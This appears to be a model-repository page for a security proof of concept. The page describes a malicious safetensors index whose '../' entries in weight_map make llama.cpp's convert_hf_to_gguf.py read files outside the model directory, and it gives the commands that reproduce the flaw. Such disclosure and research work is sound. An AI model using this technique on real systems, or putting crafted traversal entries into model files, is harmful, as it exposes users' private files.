You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

llama.cpp convert_hf_to_gguf Path Traversal PoC (CWE-22)

Security Research - Proof of Concept

This repository contains a malicious sharded safetensors model directory that demonstrates a path traversal vulnerability in llama.cpp's convert_hf_to_gguf.py. The model.safetensors.index.json contains a weight_map entry with ../ path traversal sequences that cause the converter to read files outside the model directory.

Files

  • model.safetensors.index.json โ€” Malicious weight index with path traversal in weight_map values
  • model.safetensors โ€” Minimal valid safetensors file (triggers sharded model detection)
  • config.json โ€” Minimal LLaMA config
  • tokenizer.json / tokenizer_config.json โ€” Minimal tokenizer files
  • poc.py โ€” Full PoC script that generates the malicious model directory

Usage

pip install gguf transformers
git clone https://github.com/ggerganov/llama.cpp
python poc.py
python llama.cpp/convert_hf_to_gguf.py ./malicious_model/ --outfile /tmp/output.gguf

Disclaimer

This PoC is for authorized security research only. The payload reads a harmless sentinel file created by the script itself.

Downloads last month
-
Safetensors
Model size
0 params
Tensor type
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support